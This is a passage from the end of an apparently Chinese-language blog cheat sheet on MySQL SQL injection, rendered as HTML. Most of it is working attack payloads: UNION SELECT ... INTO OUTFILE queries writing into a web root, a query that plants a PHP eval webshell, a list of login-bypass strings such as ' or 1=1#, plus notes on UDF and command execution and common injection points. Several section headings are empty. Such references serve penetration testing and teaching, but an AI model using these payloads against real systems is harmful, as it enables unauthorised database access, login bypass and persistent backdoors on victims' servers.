<h4 id="payload-5"><a href="#payload-5" class="headerlink" title="payload"></a>payload</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> DATABASE() <span class="keyword">INTO</span> OUTFILE <span class="string">&#x27;C:\\phpstudy\\WWW\\test\\1&#x27;</span>;</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> DATABASE() <span class="keyword">INTO</span> OUTFILE <span class="string">&#x27;C:/phpstudy/WWW/test/1&#x27;</span>;</span><br></pre></td></tr></table></figure>

<h4 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>写入webshell</h4><h5 id="条件-2"><a href="#条件-2" class="headerlink" title="条件"></a>条件</h5><ul>
<li>需要知道网站的绝对物理路径，这样导出后的webshell可访问</li>
<li>对需导出的目录有可写权限。</li>
</ul>
<h5 id="payload-6"><a href="#payload-6" class="headerlink" title="payload"></a>payload</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span>  &quot;&lt;?php eval($_POST[&#x27;chybeta&#x27;])?&gt;&quot; <span class="keyword">INTO</span> OUTFILE <span class="string">&#x27;C:/phpstudy/WWW/test/webshell.php&#x27;</span>;</span><br></pre></td></tr></table></figure>

<h2 id="万能密码后台登陆"><a href="#万能密码后台登陆" class="headerlink" title="万能密码后台登陆"></a>万能密码后台登陆</h2><ul>
<li>admin’ —</li>
<li>admin’ #</li>
<li>admin’&#x2F;*</li>
<li>or ‘&#x3D;’ or</li>
<li>‘ or 1&#x3D;1—</li>
<li>‘ or 1&#x3D;1#</li>
<li>‘ or 1&#x3D;1&#x2F;*</li>
<li>‘) or ‘1’&#x3D;’1—</li>
<li>‘) or (‘1’&#x3D;’1—</li>
</ul>
<h2 id="PDO堆查询"><a href="#PDO堆查询" class="headerlink" title="PDO堆查询"></a>PDO堆查询</h2><h1 id="绕过技巧"><a href="#绕过技巧" class="headerlink" title="绕过技巧"></a>绕过技巧</h1><p>请见：<a target="_blank" rel="noopener" href="https://chybeta.gitbooks.io/waf-bypass/content/sql-injection/ji-ben-guo-waf-zi-shi-hui-zong.html">WAF Bypass:SQL Injection</a></p>
<h2 id="sqlmap-tamper编写"><a href="#sqlmap-tamper编写" class="headerlink" title="sqlmap-tamper编写"></a>sqlmap-tamper编写</h2><h1 id="版本特性"><a href="#版本特性" class="headerlink" title="版本特性"></a>版本特性</h1><ul>
<li>mysql5.0以后 information.schema库出现</li>
<li>mysql5.1以后 udf 导入xx\lib\plugin\ 目录下</li>
<li>mysql5.x以后 system执行命令</li>
</ul>
<h1 id="常见sql注入位置"><a href="#常见sql注入位置" class="headerlink" title="常见sql注入位置"></a>常见sql注入位置</h1><ul>
<li>常见GET、POST参数</li>
<li>登陆框</li>
<li>http头</li>
</ul>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>m0sway</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2022/02/17/Mysql%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/">http://example.com/2022/02/17/Mysql%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/Mysql-SQli/"># Mysql,SQli</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2022/02/18/Mssql%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/">Mssql注入备忘录</a>
            
            
            <a class="next" rel="next" href="/2022/01/22/nynusec%E5%B9%B3%E5%8F%B0%E5%85%A8WriteUp(PWN)/">nynusec平台全WriteUp(PWN)</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© m0sway
    </div>
    
        <!-- 统计 -->
        <span id="busuanzi_container_site_pv">
                访问量: <span id="busuanzi_value_site_pv"></span>
        </span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv" style='display:none'>
                访客: <span id="busuanzi_value_site_uv"></span>
        </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  
</footer>

    </div>
</body>

</html>